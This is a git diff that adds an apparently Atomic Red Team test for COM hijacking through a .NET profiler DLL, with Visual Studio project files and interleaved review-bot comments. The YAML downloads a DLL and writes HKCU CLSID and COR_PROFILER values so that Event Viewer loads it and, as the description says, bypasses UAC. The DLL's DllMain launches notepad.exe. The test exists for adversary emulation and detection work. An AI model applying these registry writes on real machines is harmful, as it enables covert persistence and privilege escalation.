diff --git a/.gitignore b/.gitignore
index 728f7463..b07d4684 100644
--- a/.gitignore
+++ b/.gitignore
@@ -2,8 +2,24 @@
.DS_Store
.vscode
.atom
+
atomic-red-team/enterprise-attack.json
+# Compiled Object files
+*.slo
+*.lo
+*.o
+*.obj
+
+# vs logs
+*.tlog
+*.log
+
+# Precompiled Headers
+*.gch
+*.pch
+
+
docs/.sass-cache/
docs/_site/
**/Invoke-AtomicTest-ExecutionLog.csv
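Review bot: The added rules ignore compiler intermediates (`*.obj`, `*.pch`, `*.tlog`) but not the build output directory or per-user project files, and this same commit checks in `atomics/T1122/src/x64/Release/atomicNotepad.dll` and `atomicNotepad.vcxproj.user`. The Release DLL carries the same blob id (`d198b0aa`) as `atomics/T1122/bin/T1122x64.dll`, so it is a second copy of a binary that cannot be reviewed in a diff. I would add `atomics/*/src/x64/` and `*.vcxproj.user` here, keep only the copy under `bin/`, and record how that copy was built from `src/` so it can be reproduced and compared.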
diff --git a/atomics/T1122/T1122.yaml b/atomics/T1122/T1122.yaml
new file mode 100644
index 00000000..99ca39ce
--- /dev/null
+++ b/atomics/T1122/T1122.yaml
@@ -0,0 +1,50 @@
+---
+attack_technique: T1122
+display_name: Component Object Model (COM) Hijacking
+
+atomic_tests:
+- name: COM Hijack Leveraging .NET profiler DLL
+ description: |
+ Creates environment variables and CLSID to enable a .NET profiler. The profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by the Event Viewer process. Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
+
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ file_name:
+ description: profiler DLL
+ type: Path
+ default: PathToAtomicsFolder\T1122\bin\T1122x64.dll
+ clsid_guid:
+ description: custom clsid guid
+ type: String
+ default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
+
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ #{file_name} must be present
+ prereq_command: | # commands to check if prerequisites for running this test are met. For the "command_prompt" executor, if any command returns a non-zero exit code, the pre-requisites are not met. For the "powershell" executor, all commands are run as a script block and the script block must return 0 for success.
+ if (Test-Path #{file_name}) {exit 0} else {exit 1}
+ get_prereq_command: |
+ New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1122/bin/T1122x64.dll" -OutFile "#{file_name}"
+
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
+ New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null
+ New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
+ New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
+ New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
+ Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
+ START MMC.EXE EVENTVWR.MSC
+ Start-Sleep 5
+ cleanup_command: |
+ Write-Host "Removing registry keys" -ForegroundColor Cyan
+ Remove-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}" -Recurse -Force
+ Remove-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -Force | Out-Null
+ Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -Force | Out-Null
+ Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -Force | Out-Null
\ No newline at end of file
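Review bot: `get_prereq_command` downloads `T1122x64.dll` from the mutable `raw/master` ref, and the executor then registers whatever arrived as a CLR profiler under `HKCU:\Environment` with no integrity check in between. Pin the URL to a commit and verify the file before the prereq reports success, e.g. `if ((Get-FileHash "#{file_name}" -Algorithm SHA256).Hash -ne "<EXPECTED_SHA256>") { Remove-Item "#{file_name}"; exit 1 }` (the hash is a placeholder to be filled from the reviewed build). Separately, `#{file_name}` is unquoted in `Test-Path #{file_name}` and in both `-Value #{file_name}` arguments, so a path containing spaces breaks the prereq check and the registry writes; quote it as the `-OutFile` line already does. The `cleanup_command` lines would also benefit from `-ErrorAction Ignore`, so that a partially run test can still be cleaned up and the `COR_*` values do not linger for later .NET processes.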
diff --git a/atomics/T1122/bin/T1122x64.dll b/atomics/T1122/bin/T1122x64.dll
new file mode 100644
index 00000000..d198b0aa
Binary files /dev/null and b/atomics/T1122/bin/T1122x64.dll differ
diff --git a/atomics/T1122/src/atomicNotepad.sln b/atomics/T1122/src/atomicNotepad.sln
new file mode 100644
index 00000000..81eab91d
--- /dev/null
+++ b/atomics/T1122/src/atomicNotepad.sln
@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.30011.22
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "atomicNotepad", "atomicNotepad\atomicNotepad.vcxproj", "{53529597-67F0-4159-AD9B-DE118E7C1A0D}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|x64 = Debug|x64
+ Debug|x86 = Debug|x86
+ Release|x64 = Release|x64
+ Release|x86 = Release|x86
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {53529597-67F0-4159-AD9B-DE118E7C1A0D}.Debug|x64.ActiveCfg = Debug|x64
+ {53529597-67F0-4159-AD9B-DE118E7C1A0D}.Debug|x64.Build.0 = Debug|x64
+ {53529597-67F0-4159-AD9B-DE118E7C1A0D}.Debug|x86.ActiveCfg = Debug|Win32
+ {53529597-67F0-4159-AD9B-DE118E7C1A0D}.Debug|x86.Build.0 = Debug|Win32
+ {53529597-67F0-4159-AD9B-DE118E7C1A0D}.Release|x64.ActiveCfg = Release|x64
+ {53529597-67F0-4159-AD9B-DE118E7C1A0D}.Release|x64.Build.0 = Release|x64
+ {53529597-67F0-4159-AD9B-DE118E7C1A0D}.Release|x86.ActiveCfg = Release|Win32
+ {53529597-67F0-4159-AD9B-DE118E7C1A0D}.Release|x86.Build.0 = Release|Win32
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+ GlobalSection(ExtensibilityGlobals) = postSolution
+ SolutionGuid = {C1ED96A7-1052-454C-9B56-302FD3426CCC}
+ EndGlobalSection
+EndGlobal
diff --git a/atomics/T1122/src/atomicNotepad/atomicNotepad.vcxproj b/atomics/T1122/src/atomicNotepad/atomicNotepad.vcxproj
new file mode 100644
index 00000000..fdcc818c
--- /dev/null
+++ b/atomics/T1122/src/atomicNotepad/atomicNotepad.vcxproj
@@ -0,0 +1,169 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ 16.0
+ {53529597-67F0-4159-AD9B-DE118E7C1A0D}
+ Win32Proj
+ atomicNotepad
+ 10.0
+
+
+
+ DynamicLibrary
+ true
+ v142
+ Unicode
+
+
+ DynamicLibrary
+ false
+ v142
+ true
+ Unicode
+
+
+ DynamicLibrary
+ true
+ v142
+ Unicode
+
+
+ DynamicLibrary
+ false
+ v142
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ true
+
+
+ true
+
+
+ false
+
+
+ false
+
+
+
+ Use
+ Level3
+ true
+ WIN32;_DEBUG;ATOMICNOTEPAD_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
+ true
+ pch.h
+
+
+ Windows
+ true
+ false
+
+
+
+
+ Use
+ Level3
+ true
+ _DEBUG;ATOMICNOTEPAD_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
+ true
+ pch.h
+
+
+ Windows
+ true
+ false
+
+
+
+
+ Use
+ Level3
+ true
+ true
+ true
+ WIN32;NDEBUG;ATOMICNOTEPAD_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
+ true
+ pch.h
+
+
+ Windows
+ true
+ true
+ true
+ false
+
+
+
+
+ Use
+ Level3
+ true
+ true
+ true
+ NDEBUG;ATOMICNOTEPAD_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
+ true
+ pch.h
+
+
+ Windows
+ true
+ true
+ true
+ false
+
+
+
+
+
+
+
+
+
+ Create
+ Create
+ Create
+ Create
+
+
+
+
+
+
\ No newline at end of file
diff --git a/atomics/T1122/src/atomicNotepad/atomicNotepad.vcxproj.filters b/atomics/T1122/src/atomicNotepad/atomicNotepad.vcxproj.filters
new file mode 100644
index 00000000..d4f9881b
--- /dev/null
+++ b/atomics/T1122/src/atomicNotepad/atomicNotepad.vcxproj.filters
@@ -0,0 +1,33 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+ Header Files
+
+
+ Header Files
+
+
+
+
+ Source Files
+
+
+ Source Files
+
+
+
\ No newline at end of file
diff --git a/atomics/T1122/src/atomicNotepad/atomicNotepad.vcxproj.user b/atomics/T1122/src/atomicNotepad/atomicNotepad.vcxproj.user
new file mode 100644
index 00000000..88a55094
--- /dev/null
+++ b/atomics/T1122/src/atomicNotepad/atomicNotepad.vcxproj.user
@@ -0,0 +1,4 @@
+
+
+
+
\ No newline at end of file
diff --git a/atomics/T1122/src/atomicNotepad/dllmain.cpp b/atomics/T1122/src/atomicNotepad/dllmain.cpp
new file mode 100644
index 00000000..3aa1a7ca
--- /dev/null
+++ b/atomics/T1122/src/atomicNotepad/dllmain.cpp
@@ -0,0 +1,19 @@
+// dllmain.cpp : Defines the entry point for the DLL application.
+#include "pch.h"
+
+BOOL APIENTRY DllMain(HMODULE hModule,
+ DWORD ul_reason_for_call,
+ LPVOID lpReserved
+)
+{
+ switch (ul_reason_for_call)
+ {
+ case DLL_PROCESS_ATTACH:
+ WinExec("notepad.exe", SW_SHOWNORMAL);
+ case DLL_THREAD_ATTACH:
+ case DLL_THREAD_DETACH:
+ case DLL_PROCESS_DETACH:
+ break;
+ }
+ return TRUE;
+}
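Review bot: `WinExec("notepad.exe", SW_SHOWNORMAL)` in the `DLL_PROCESS_ATTACH` case passes a bare file name, so which binary starts depends on the search path of whichever process loaded the DLL, and the test description says that process may be running at high integrity. Resolving the path from the system directory keeps the payload to the intended benign program. The call also runs inside `DllMain` under the loader lock, where Microsoft's DLL guidance advises against creating processes, so it deserves a comment saying this is deliberate for the test and must stay a single call. The case has no `break;` and falls through to the other labels; that is harmless today but should be made explicit.

```cpp
    case DLL_PROCESS_ATTACH:
    {
        // Test payload only. DllMain runs under the loader lock, so keep this to one call.
        // Build an absolute path so the launch does not depend on the host's search path.
        char notepad[MAX_PATH];
        UINT len = GetSystemDirectoryA(notepad, MAX_PATH);
        if (len > 0 && len + sizeof("\\notepad.exe") <= MAX_PATH)
        {
            lstrcatA(notepad, "\\notepad.exe");
            WinExec(notepad, SW_SHOWNORMAL);
        }
        break;
    }
    // … unchanged: DLL_THREAD_ATTACH / DLL_THREAD_DETACH / DLL_PROCESS_DETACH cases …
```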
diff --git a/atomics/T1122/src/atomicNotepad/framework.h b/atomics/T1122/src/atomicNotepad/framework.h
new file mode 100644
index 00000000..54b83e94
--- /dev/null
+++ b/atomics/T1122/src/atomicNotepad/framework.h
@@ -0,0 +1,5 @@
+#pragma once
+
+#define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
+// Windows Header Files
+#include
diff --git a/atomics/T1122/src/atomicNotepad/pch.cpp b/atomics/T1122/src/atomicNotepad/pch.cpp
new file mode 100644
index 00000000..64b7eef6
--- /dev/null
+++ b/atomics/T1122/src/atomicNotepad/pch.cpp
@@ -0,0 +1,5 @@
+// pch.cpp: source file corresponding to the pre-compiled header
+
+#include "pch.h"
+
+// When you are using pre-compiled headers, this source file is necessary for compilation to succeed.
diff --git a/atomics/T1122/src/atomicNotepad/pch.h b/atomics/T1122/src/atomicNotepad/pch.h
new file mode 100644
index 00000000..885d5d62
--- /dev/null
+++ b/atomics/T1122/src/atomicNotepad/pch.h
@@ -0,0 +1,13 @@
+// pch.h: This is a precompiled header file.
+// Files listed below are compiled only once, improving build performance for future builds.
+// This also affects IntelliSense performance, including code completion and many code browsing features.
+// However, files listed here are ALL re-compiled if any one of them is updated between builds.
+// Do not add files here that you will be updating frequently as this negates the performance advantage.
+
+#ifndef PCH_H
+#define PCH_H
+
+// add headers that you want to pre-compile here
+#include "framework.h"
+
+#endif //PCH_H
diff --git a/atomics/T1122/src/x64/Release/atomicNotepad.dll b/atomics/T1122/src/x64/Release/atomicNotepad.dll
new file mode 100644
index 00000000..d198b0aa
Binary files /dev/null and b/atomics/T1122/src/x64/Release/atomicNotepad.dll differ